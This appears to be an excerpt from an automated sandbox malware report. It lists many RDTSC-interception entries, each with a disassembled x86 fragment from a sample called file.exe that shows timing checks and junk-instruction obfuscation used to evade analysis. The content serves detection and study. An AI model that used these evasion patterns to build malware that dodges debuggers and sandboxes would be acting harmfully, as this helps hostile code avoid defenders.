                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 24350B second address: 24351A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b pushad 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 24351A second address: 243524 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 243524 second address: 243553 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 jp 00007F84B0D65608h 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 jnc 00007F84B0D655F6h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 243553 second address: 243558 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 243558 second address: 24355D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 243D89 second address: 243E38 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F84B0B050D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a js 00007F84B0B050DCh 0x00000010 popad 0x00000011 push eax 0x00000012 pushad 0x00000013 js 00007F84B0B050DCh 0x00000019 jmp 00007F84B0B050E7h 0x0000001e popad 0x0000001f nop 0x00000020 push 00000000h 0x00000022 push edx 0x00000023 call 00007F84B0B050D8h 0x00000028 pop edx 0x00000029 mov dword ptr [esp+04h], edx 0x0000002d add dword ptr [esp+04h], 0000001Bh 0x00000035 inc edx 0x00000036 push edx 0x00000037 ret 0x00000038 pop edx 0x00000039 ret 0x0000003a mov dword ptr [ebp+122DB765h], edx 0x00000040 lea eax, dword ptr [ebp+124978E9h] 0x00000046 push 00000000h 0x00000048 push ebp 0x00000049 call 00007F84B0B050D8h 0x0000004e pop ebp 0x0000004f mov dword ptr [esp+04h], ebp 0x00000053 add dword ptr [esp+04h], 00000014h 0x0000005b inc ebp 0x0000005c push ebp 0x0000005d ret 0x0000005e pop ebp 0x0000005f ret 0x00000060 pushad 0x00000061 adc cx, EFDAh 0x00000066 sub dword ptr [ebp+1248BBA5h], eax 0x0000006c popad 0x0000006d nop 0x0000006e push ebx 0x0000006f push eax 0x00000070 push edx 0x00000071 jmp 00007F84B0B050E5h 0x00000076 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 243E38 second address: 243E6C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0D65601h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e jmp 00007F84B0D65609h 0x00000013 pop eax 0x00000014 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 243E6C second address: 243EB6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 movzx edi, si 0x0000000c lea eax, dword ptr [ebp+124978A5h] 0x00000012 push 00000000h 0x00000014 push ebp 0x00000015 call 00007F84B0B050D8h 0x0000001a pop ebp 0x0000001b mov dword ptr [esp+04h], ebp 0x0000001f add dword ptr [esp+04h], 0000001Ah 0x00000027 inc ebp 0x00000028 push ebp 0x00000029 ret 0x0000002a pop ebp 0x0000002b ret 0x0000002c adc dx, A3C2h 0x00000031 jl 00007F84B0B050DCh 0x00000037 push eax 0x00000038 push esi 0x00000039 pushad 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 243EB6 second address: 243EBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 243EBC second address: 223FE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 mov dword ptr [esp], eax 0x00000009 mov edx, 52BB3E47h 0x0000000e call dword ptr [ebp+122D1DE8h] 0x00000014 push ecx 0x00000015 pushad 0x00000016 push edi 0x00000017 pop edi 0x00000018 jne 00007F84B0B050D6h 0x0000001e jmp 00007F84B0B050DCh 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 27E531 second address: 27E535 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 27E738 second address: 27E73C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 27E73C second address: 27E765 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0D65607h 0x00000007 pushad 0x00000008 jmp 00007F84B0D655FDh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 27EB0E second address: 27EB30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F84B0B050E6h 0x0000000d popad 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 27EB30 second address: 27EB37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edi 0x00000007 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 27EE2B second address: 27EE38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jo 00007F84B0B050D6h 0x0000000d rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2823FE second address: 282404 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 282404 second address: 282449 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F84B0B050E3h 0x00000009 popad 0x0000000a jno 00007F84B0B050DEh 0x00000010 jmp 00007F84B0B050E9h 0x00000015 popad 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 28556C second address: 285576 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F84B0D655F6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 285576 second address: 2855AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F84B0B050E4h 0x0000000b popad 0x0000000c push ecx 0x0000000d pushad 0x0000000e jmp 00007F84B0B050E9h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 285106 second address: 285129 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F84B0D655F6h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push esi 0x00000010 pop esi 0x00000011 push eax 0x00000012 pop eax 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 pushad 0x0000001a popad 0x0000001b jno 00007F84B0D655F6h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 28BF2F second address: 28BF35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 28BF35 second address: 28BF42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jl 00007F84B0D655FCh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 28A7FE second address: 28A811 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 jo 00007F84B0B050D6h 0x0000000c jng 00007F84B0B050D6h 0x00000012 pop ecx 0x00000013 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 28A811 second address: 28A853 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F84B0D655F8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c js 00007F84B0D655F6h 0x00000012 jng 00007F84B0D655F6h 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a jmp 00007F84B0D65607h 0x0000001f popad 0x00000020 push esi 0x00000021 pushad 0x00000022 popad 0x00000023 jng 00007F84B0D655F6h 0x00000029 pop esi 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d popad 0x0000002e rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 28A9B0 second address: 28A9CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F84B0B050E3h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 28A9CE second address: 28A9FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F84B0D655FCh 0x00000009 jmp 00007F84B0D65603h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jc 00007F84B0D655F6h 0x00000017 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 28A9FA second address: 28AA0E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0B050E0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 28AA0E second address: 28AA18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F84B0D655F6h 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 28AA18 second address: 28AA1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 28AE5F second address: 28AE7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F84B0D65608h 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 28AE7B second address: 28AE97 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0B050E6h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 28AE97 second address: 28AEA7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007F84B0D655F6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 28AEA7 second address: 28AEAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 28F432 second address: 28F43C instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F84B0D655F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 28F43C second address: 28F453 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F84B0B050E0h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 28F453 second address: 28F46E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F84B0D65603h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 28F72C second address: 28F73B instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F84B0B050D6h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 28F73B second address: 28F743 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 28FA01 second address: 28FA10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 jc 00007F84B0B050DCh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 28FA10 second address: 28FA14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 293C65 second address: 293C69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29360F second address: 293636 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F84B0D655F6h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 jmp 00007F84B0D65604h 0x00000017 pop edx 0x00000018 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 293636 second address: 29363E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29393F second address: 293945 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 293945 second address: 29394A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29394A second address: 29395B instructions: 0x00000000 rdtsc 0x00000002 jns 00007F84B0D655FCh 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29395B second address: 293961 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29B212 second address: 29B279 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F84B0D65606h 0x00000009 jmp 00007F84B0D65602h 0x0000000e popad 0x0000000f pushad 0x00000010 jmp 00007F84B0D65601h 0x00000015 jmp 00007F84B0D65607h 0x0000001a jmp 00007F84B0D65600h 0x0000001f popad 0x00000020 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29B279 second address: 29B299 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F84B0B050DBh 0x00000008 jmp 00007F84B0B050DEh 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 299477 second address: 29947B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2998B5 second address: 2998BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F84B0B050D6h 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2998BF second address: 2998E9 instructions: 0x00000000 rdtsc 0x00000002 je 00007F84B0D655F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F84B0D65604h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F84B0D655FAh 0x00000016 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 299B60 second address: 299B85 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 jne 00007F84B0B050D6h 0x0000000f push eax 0x00000010 pop eax 0x00000011 pop esi 0x00000012 jmp 00007F84B0B050DDh 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 299B85 second address: 299BB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jng 00007F84B0D655F6h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F84B0D655FCh 0x00000016 jmp 00007F84B0D65604h 0x0000001b rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 299BB6 second address: 299BC8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0B050DEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29A12B second address: 29A12F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29A12F second address: 29A133 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29A67C second address: 29A681 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29A681 second address: 29A687 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29A687 second address: 29A68B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29A68B second address: 29A6A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F84B0B050E5h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29ABB9 second address: 29ABBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29ABBD second address: 29ABC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29ABC3 second address: 29ABC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 29AF0E second address: 29AF12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1FAED2 second address: 1FAEE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop eax 0x00000007 push esi 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c pop eax 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1FAEE4 second address: 1FAEE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A4E00 second address: 2A4E10 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F84B0D655FAh 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A4E10 second address: 2A4E28 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jns 00007F84B0B050D6h 0x00000012 jns 00007F84B0B050D6h 0x00000018 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A4E28 second address: 2A4E38 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 je 00007F84B0D655F6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A4E38 second address: 2A4E3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A4E3C second address: 2A4E52 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0D65600h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A4E52 second address: 2A4E68 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F84B0B050DCh 0x00000008 je 00007F84B0B050D6h 0x0000000e push eax 0x0000000f push edx 0x00000010 jng 00007F84B0B050D6h 0x00000016 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A4E68 second address: 2A4E6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A4FD0 second address: 2A4FF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F84B0B050E1h 0x00000009 jmp 00007F84B0B050E3h 0x0000000e rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A517F second address: 2A5183 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A5183 second address: 2A5189 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A5189 second address: 2A51B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F84B0D65609h 0x0000000c jg 00007F84B0D655F6h 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 push ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A51B5 second address: 2A51E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F84B0B050E2h 0x00000009 pop ebx 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F84B0B050E1h 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A51E0 second address: 2A51F0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F84B0D655FAh 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A51F0 second address: 2A51F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A5335 second address: 2A5341 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F84B0D655F6h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A54CA second address: 2A54CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2A5619 second address: 2A562A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F84B0D655FDh 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2B0BE5 second address: 2B0BF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F84B0B050DEh 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2B0BF7 second address: 2B0C02 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F84B0D655F6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1F5FC0 second address: 1F5FF8 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F84B0B050D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jo 00007F84B0B050DEh 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 je 00007F84B0B050D6h 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F84B0B050E4h 0x0000001f jmp 00007F84B0B050DAh 0x00000024 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1F5FF8 second address: 1F5FFE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2AF1D2 second address: 2AF1DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                  Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 2AF1DA second address: 2AF1DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
